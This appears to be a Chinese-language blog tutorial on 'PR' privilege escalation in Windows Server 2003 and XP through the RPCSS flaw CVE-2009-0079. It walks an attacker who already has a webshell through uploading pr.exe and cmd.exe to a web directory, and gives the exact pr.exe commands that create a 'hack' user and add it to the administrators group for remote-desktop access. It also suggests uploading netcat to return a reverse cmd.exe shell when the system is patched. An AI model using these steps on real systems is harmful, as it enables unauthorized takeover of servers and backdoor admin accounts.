Windows PR提权

网友投稿 1697 2022-09-16

Windows PR提权

Windows PR提权

​目录​

​​提权利用的漏洞​​

​​PR提权​​

提权利用的漏洞

​Microsoft Windows RPCSS服务隔离本地权限提升漏洞​

RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

BUGTRAQ  ID: 34443

CVE(CAN) ID: CVE-2009-0079

发布日期:2009-04-14

更新日期:2009-04-24

受影响系统:

Microsoft Windows XP x64 SP2

Microsoft Windows XP x64

Microsoft Windows XP SP3

Microsoft Windows XP SP2

Microsoft Windows Server 2003 SP2

Microsoft Windows Server 2003 SP1

也就是说只有Windows Server 2003和windows xp系统能够使用 pr 提权。

PR提权

以下环境,Windows Server 2003

很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。

我们把下面两个程序上传到网站目录下去

程序链接:链接: ​​  提取码: unyc

然后执行下面这条命令,把当前终端的执行程序设置成我们上传的 cmd.exe

setp "C:\website\站酷爱装网V2012版\UploadFiles\cmd.exe"

然后我们就可以做我们想做的任何事情了。我们的命令用双引号引住,前面加上 pr.exe

pr.exe "net user hack 123 /add" #新建一个hack用户,密码为 123pr.exe "net localgroup administrators hack /add" #将hack用户加入administrators管理员组

接着,我们就可以用远程桌面登录了,前提是目标主机开启了3389远程端口

​但是​,如果目标机打上了​ KB952004补丁​ 的话,是没有办法使用pr进行提权的。

这时,我们可以尝试上传nc,反弹 ​c:\windows\system32\cmd.exe​ 。

相关文章:​​Netcat瑞士军刀的简单使用​​

​​UDF提权​​

版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Windows下包管理工具Bower的安装和使用
下一篇:适合小白的Demo_easyui+core3第三章通用类和方法
相关文章

 发表评论

暂时没有评论,来抢沙发吧~